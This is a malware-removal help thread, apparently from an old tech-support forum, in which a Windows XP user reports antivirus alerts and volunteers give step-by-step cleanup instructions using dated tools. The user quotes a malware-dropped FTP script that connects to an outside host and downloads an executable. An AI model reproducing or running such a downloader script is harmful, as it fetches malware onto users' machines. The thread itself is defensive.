Hello, I hope that you'll help me! This is the case:

I recently applied for a cable internet service from my local ISP, and after a while a technician from the ISP came along, made the phisical connection and also with my new Motorola SurfBoard SB5101e modem and a set of drivers. I have never before, I say NEVER BEFORE, had problems with viruses, malware, spyware and so on (And I have used Internet from a different ISP)... ,but when the guy connected the modem on-line and started Firefox (3.5.2), my Antivirus (Avira AntiVir Personal - Free Antivirus v. 9.0.0.407) started notifying me for viruses (or what ever they are called). I tried to scan the complete system in safe mode with Avira AntiVir and Malwarebytes' Anti-Malware (since I read that it is the best anti malware), and it seemed that the problem was gone, but then again when rebooted the pc I tried to connect again and the problem was still here, I even tried to format and reinstall the Windows XP SP3 3 times and until I connect the cable modem everything is ok but when i do connect it, the problem appears again. Below I'm sending you a report from Avira AntiVir (I intentionally left them "access allowed" so the whole bunch would show up). I hope that you'll help me, cos I'm loosing my nervs over this :cry :( :crybaby .

    Welcome to MajorGeeks!

Please follow the instructions in the READ & RUN ME FIRST link given futher down and attach the requested logs when you finish these instructions.

    • If you have problems where no tools seem to run, please try following the steps given in the below and then continue on no matter what you find. You only need to try the TDSSserv steps if having problems getting scans in the Read & Run Me First. If TDSSserv is not found, just continue on with the READ & RUN ME.
READ & RUN ME FIRST. Malware Removal Guide
    • If something does not run, write down the info to explain to us later but keep on going.
    • Do not assume that because one step does not work that they all will not.
    • After completing the READ & RUN ME and attaching your logs, make sure that you tell us what problems still remain ( if any still do )!
    Helpful Notes:
    1. If you run into problems trying to run the READ & RUN ME or any of the scans in normal boot mode, you can run the steps in safe boot mode but make sure you tell us what you did later when you post logs. See the below if you do not know how to boot in safe mode:
    2. If you have problems downloading on the problem PC, download the tools and the manual updates for SUPERAntiSpyware, Malwarebytes and Spybot ( links are given in the READ & RUN ME) onto another PC and then burn to a CD. Then copy them to the problem PC. You will have to skip getting updates if (and only if) your internet connection does not work. Yes you could use a flash drive too but flash drives are writeable and infections can spread to them.
    3. If you cannot seem to login to an infected user account, try using a different user account (if you have one) in either normal or safe boot mode and running only SUPERAntiSpyware and Malwarebytes while logged into this other user account. Then reboot and see if you can log into the problem user account. If you can then run SUPERAntiSpyware, Malwarebytes, ComboFix and MGtools on the infected account as requested in the instructions.
    4. To avoid additional delay in getting a response, it is strongly advised that after completing the READ & RUN ME you also read this sticky:
Any additional post is a bump which will add more delay. Once you attach the logs, your thread will be in the work queue and as stated, our system works the oldest threads FIRST.

    2nd part of the logs.

By the way, before I do this, I use to notice one file named simply i (C:\Windows\System32\i) and it had this lines in it
    Code:
    open v1.virtual-rejectz.com 4356
    user ik ik
    binary
    get Ms14.exe
    quit

Now it's gone (since I deleted it in some point of the procedure and also I deleted the taskman.exe files both in windows and system32 folders)

Please review this logs and tell me if I'm relived from the bad malware, cos I do not notice any problem now)

    Thanks a lot...

    Hello, liquid_sk

The below fixes are specific to this member's problem and should only be used for issue(s) on this machine. Also, please do not install any other software while we are still working with you unless instructed. Once we have given you the all clean and final instructions you will be free to install what you want.

What do you know about these folders...
    C:\12345
    C:\Documents and Settings\LiQuid\My Documents\„à¦*¢** Œ*âãà

    And this file?
    C:\Documents and Settings\LiQuid\nigzss.txt

*I'm curious, liquid - what happened on this date? Aug 21 2009

    Please move this file!
C:\MGtools\MGtools.exe <--- move MGtools.exe to directly under the C:\ directory.

    Step 1:
Run C:\MGtools\analyse.exe by double clicking on it (Note: if using Vista, don't double click, use right click and select Run As Administrator). This is really HijackThis (select Do a system scan only) and select the following lines but DO NOT CLICK FIX until you exit all browser sessions including the one you are reading in right now:
    After clicking Fix, exit HJT.

    Step 2:
Now download The Avenger by Swandog469, and save it to your Desktop.
    • Extract avenger.exe from the Zip file and save it to your desktop
    • Run avenger.exe by double-clicking on it.
    • Do not change any check box options!!
    • Copy everything in the Quote box below, and paste it into the Input script here: part of the window:
    • Now click the Execute button.
    • Click Yes to the prompt to confirm you want to execute.
    • Click Yes to the Reboot now? question that will appear when Avenger finishes running.
    • Your PC should reboot, if not, reboot it yourself.
    • A log file from Avenger will be produced at C:\avenger.txt and it will popup for you to view when you login after reboot.

    Step 3:
Running HostXpert to Reset Default Hosts File
Download HostsXpert and then follow the below steps.
    • Unzip HostsXpert.zip
    • It will create a folder named HostsXpert in whatever folder you extract it to.
    • Run HostsXpert.exe by double clicking on it.
    • Click the Make Writeable? button. (if you only see a Make Read-Only selection, it is already writeable so skip this button).
    • Click Restore Microsoft's Hosts File and then click OK.
    • Click the X to exit the program

    Step 4:
Open CCleaner - select "Cleaner" > "Run Cleaner" <---use this function ONLY!

    Step 5:
Now install the latest Sun Java Runtime Environment

    Step 6:
Then run the C:\MGtools\GetLogs.bat file by double clicking on it (Note: if using Vista, use right click and select Run As Administrator).

Please attach the below logs to your next reply:
    • C:\MGlogs.zip
    • C:\avenger.txt

Make sure you tell me if you had any problems running this procedure and give a description of how things are working now!

    dr.m
